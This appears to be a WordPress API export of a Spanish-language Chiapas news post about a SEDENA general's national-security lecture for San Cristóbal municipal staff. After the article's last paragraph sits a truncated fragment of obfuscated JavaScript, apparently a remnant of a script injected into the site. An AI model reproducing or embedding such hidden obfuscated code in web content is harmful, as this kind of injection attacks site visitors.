{"id":23562,"date":"2025-08-20T04:20:54","date_gmt":"2025-08-20T04:20:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23562"},"modified":"2025-08-20T04:20:55","modified_gmt":"2025-08-20T04:20:55","slug":"fortalecen-en-san-cristobal-la-cultura-de-seguridad-nacional-con-apoyo-de-la-sedena","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23562","title":{"rendered":"Fortalecen en San Crist\u00f3bal la Cultura de Seguridad Nacional con apoyo de la SEDENA"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"23563\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287511-1024x682.jpg\" alt=\"\" class=\"wp-image-23563\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287511-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287511-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287511-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287511-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287511-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287511.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"704\" data-id=\"23564\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287508-1024x704.jpg\" alt=\"\" class=\"wp-image-23564\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287508-1024x704.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287508-300x206.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287508-768x528.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287508-1536x1056.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287508-110x75.jpg 110w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287508.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"23565\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287503-1024x682.jpg\" alt=\"\" class=\"wp-image-23565\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287503-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287503-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287503-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287503-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287503-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287503.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"746\" data-id=\"23566\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287514-1024x746.jpg\" alt=\"\" class=\"wp-image-23566\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287514-1024x746.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287514-300x219.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287514-768x560.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287514-1536x1119.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000287514.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 19 de agosto de 2025.- La presidenta municipal, Mtra. Fabiola Ricci Diestel, encabez\u00f3 la conferencia magistral \u201cDifusi\u00f3n de la Cultura de Seguridad Nacional\u201d, impartida por el General de Brigada Diplomado de Estado Mayor, Juan Ignacio Hern\u00e1ndez Velasco, comandante de la 31\/a Zona Militar de la SEDENA. El evento se realiz\u00f3 en el auditorio del CEDECO Rastro, con la participaci\u00f3n de elementos de la Polic\u00eda Municipal, Tr\u00e1nsito y Protecci\u00f3n Civil.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, la alcaldesa subray\u00f3 la importancia de estrechar lazos de colaboraci\u00f3n entre el municipio y las Fuerzas Armadas, destacando que estas pl\u00e1ticas permiten fortalecer la seguridad p\u00fablica a nivel federal, estatal y municipal. Asimismo, agradeci\u00f3 la presencia de los directores de las \u00e1reas de seguridad y protecci\u00f3n, as\u00ed como el compromiso de los elementos que asistieron a la capacitaci\u00f3n.<\/p>\n\n\n\n<p>La conferencia tuvo como prop\u00f3sito dar a conocer las misiones generales de la SEDENA y promover en la sociedad la cultura de seguridad nacional. Tambi\u00e9n busc\u00f3 generar conciencia sobre la importancia de la identidad, unidad y cohesi\u00f3n nacional como ejes fundamentales para la protecci\u00f3n y el bienestar de la ciudadan\u00eda.<\/p>\n\n\n\n<p>Finalmente, la presidenta municipal reconoci\u00f3 el respaldo de la SEDENA en San Crist\u00f3bal de Las Casas y reiter\u00f3 que la coordinaci\u00f3n con la 31\/a Zona Militar ha sido clave para mantener la seguridad en el municipio. \u201cEn unidad se puede transformar, y la SEDENA es nuestro brazo derecho para seguir brindando tranquilidad a la poblaci\u00f3n\u201d, expres\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 19 de agosto de 2025.- La presidenta municipal, Mtra. Fabiola Ricci Diestel, encabez\u00f3 la conferencia magistral \u201cDifusi\u00f3n de la Cultura de Seguridad Nacional\u201d, impartida por el General de Brigada Diplomado de Estado Mayor, Juan Ignacio Hern\u00e1ndez Velasco, comandante de la 31\/a Zona Militar de la SEDENA. El evento se realiz\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23564,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23562","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23562"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23562\/revisions"}],"predecessor-version":[{"id":23567,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23562\/revisions\/23567"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23564"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23562"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23562"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}